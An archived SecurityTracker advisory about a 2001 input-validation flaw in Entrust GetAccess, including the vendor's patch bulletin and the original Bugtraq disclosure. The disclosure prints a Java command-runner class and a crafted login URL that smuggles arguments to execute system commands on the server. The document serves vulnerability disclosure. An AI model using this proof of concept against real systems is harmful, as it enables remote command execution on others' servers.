SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Security)  >   GetAccess Vendors:   Entrust
(Entrust Releases Fix) Re: Entrust GetAccess Single Sign-on Software Lets Remote Users Execute Java Programs on the Server
SecurityTracker Alert ID:  1002126
SecurityTracker URL:  http://securitytracker.com/id/1002126
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 1 2001
Impact:   Execution of arbitrary code via network
Fix Available:  Yes  Vendor Confirmed:  Yes  

Description:   A vulnerability was reported in Entrust's GetAccess signle sign-on software that allows remote users to start Java programs that reside on the GetAccess server.

The vulnerability is reportedly due to the lack of input validation in the login modules.

To trigger this vulnerability, the remote user must identify an exploitable GetAccess Java class (a class that accepts input parameters). Then, the remote user can access a URL to cause the the Java program to be executed.

An example URL that will execute the 'cmd.class' Java class (which is not part of Entrust's GetAccess) is:

http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

When the remote user access this URL, the GetAccess server will run "/whereever/cmd.class" and execute "/bin/ls -alsi".
Impact:   A remote user can start Java programs that reside on the GetAccess server.
Solution:   The vendor has released a fix. See the Source Message for the appropriate vendor URLs for obtaining the fix.
Vendor URL:  www.entrust.com/getaccess/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   UNIX (Solaris - SunOS), Windows (NT)

Message History:   This archive entry is a follow-up to the message listed below.
Jul 28 2001 Entrust GetAccess Single Sign-on Software Lets Remote Users Execute Java Programs on the Server


 Source Message Contents
Date:  Wed, 1 Aug 2001 09:04:10 +0200
Subject:  FW: Entrust - getAccess


I did not see  Entrust answer  posted to bugtraq so I'm sending it.
Pavel M.
-----Original Message-----
From: GetAccess Support [mailto:getaccess.support@entrust.com]
Sent: 30. července 2001 16:37
To: 'MARTAK,PAVEL (HP-Czechia,ex1)'
Subject: RE: Entrust - getAccess


Good morning Pavel. 
I've included the press release and patch details below. Please let me know
if you need clarification. 
Sincerely, 
Jeff 
Entrust Security Bulletin  E01-001 
================================== 
Subject: Entrust GetAccess(tm) CGI Script Vulnerability 
Originally posted: July 27, 2001 
Summary 
======= 
An internet newsgroup posting on BUGTRAQ has identified a vulnerability in
Entrust GetAccess that could allow unauthorized execution of Java programs
installed on GetAccess web servers. This vulnerability has been confirmed by
Entrust and a patch is forthcoming. 
Detailed information on this issue has been posted to the Entrust customer
extranet on both the Entrust GetAccess Portal
(https://login.encommerce.com/private/docs/techSupport/Patches-BugFix/e01-00
1.html) and the Entrust Customer Support Extranet
(https://www.entrust.com/support/resources/recentsecuritynotes.htm).
If you have trouble reaching the portals, please call: within North America
877-754-7878, elsewhere 613-270-3700.  A hotline has been established for
the weekend of July 28th/29th, at +1 613 220 8357.
Affected Software Versions 
========================== 
 - Entrust GetAccess, all versions and platforms 
 - Specifically, servers running the Access Service, administration
application, or runtimes. 
Patch Availability 
================== 
Patches for this vulnerability will be posted to the Entrust customer
support extranet on or before Sunday, July 29th 2001.
================== 
(c) Entrust Inc. 2001 
Jeff McGrath 
Web Security Team 
getAccess Integration 
Entrust, Inc. 
"Securing the Internet" 
Customer Support Phone: 1 877 PKI SUPT 
mailto:support@entrust.com 
http://www.entrust.com 



-----Original Message----- 
From: MARTAK,PAVEL (HP-Czechia,ex1) [mailto:pavel_martak@hp.com] 
Sent: Monday, July 30, 2001 2:51 AM 
To: support@entrust.com 
Subject: FW: Entrust - getAccess 


This was announced in BUGTRAQ. 
PavelM 
-----Original Message----- 
From: rudi carell [mailto:rudicarell@hotmail.com] 
Sent: 27. července 2001 13:34 
To: BUGTRAQ@SECURITYFOCUS.COM 
Subject: Entrust - getAccess 



hola friends, 
getAccess[tm] is used as a single-sign-on system often used for large 
internet-portals. 
--- snip (http://www.entrust.com) --- 
Entrust GetAccess[tm] offers the most comprehensive solution for 
consistently deploying and enforcing 
basic and enhanced security across online applications, from Web browsers, 
to enterprise applications and 
legacy database systems. 
--- snip --- 
problem description: 
due to missing input-validation it is possible to run(start) java-programs 
on the "getaccess"-machine. 
combined with public accessibly uploads or any other possibility to create 
class-files on the server this vulnerability c 
ould be used to run arbitrary system commands on the target machine( or 
change getAccess parameters and steal any user ac 
count you want BTW). 
it should also be possible(but not proven yet) to exploit default-,install- 
or demo classes within Java or getAccess whic 
h would make the file-upload(creation) part unneeded! 
(uninstall.class is very likely an effective DOS) 


Example: 
find exploitable getAccess-class(one which accepts params!) or upload a 
"command" programm: 
--- cut here (example cmd.java) --- 
import java.io.*; 
public class cmd { 
public static void main(String args[]) { 
s = null; 
try { 
Process p = Runtime.getRuntime().exec(args[0]+" "+args[1]); 
BufferedReader stdInput = new BufferedReader(new 
InputStreamReader(p.getInputStream())); 
BufferedReader stdError = new BufferedReader(new 
InputStreamReader(p.getErrorStream())); 
System.out.println("Content-type: text/html\n\n"); 
while ((s = stdInput.readLine()) != null) { System.out.println(s); } 
while ((s = stdError.readLine()) != null) { System.out.println(s); } 
System.exit(0); 
} 
catch (IOException e) { e.printStackTrace(); System.exit(-1); } 
} } 
--- cut here --- 


later then .. a http-request to : 
http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/b

in/ls%20-alsi 
.. will run "/whereever/cmd.class" and execute "/bin/ls -alsi" 


Summary: 
object: *.gas.bat  (all the getAccess cgi-shell-scripts) 
class: input validation 
remote: yes 
vendor: has been informed with a separate e-mail ( entrust@entrust.com ) 


(and BTW. i would NEVER EVER recommand to use shell-scripts for 
authentication purposes!) 


nice day, 


rC 
rudicarell@hotmail.com 
security@freefly.com 
http://www.freefly.com/security/ 








_________________________________________________________________ 
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC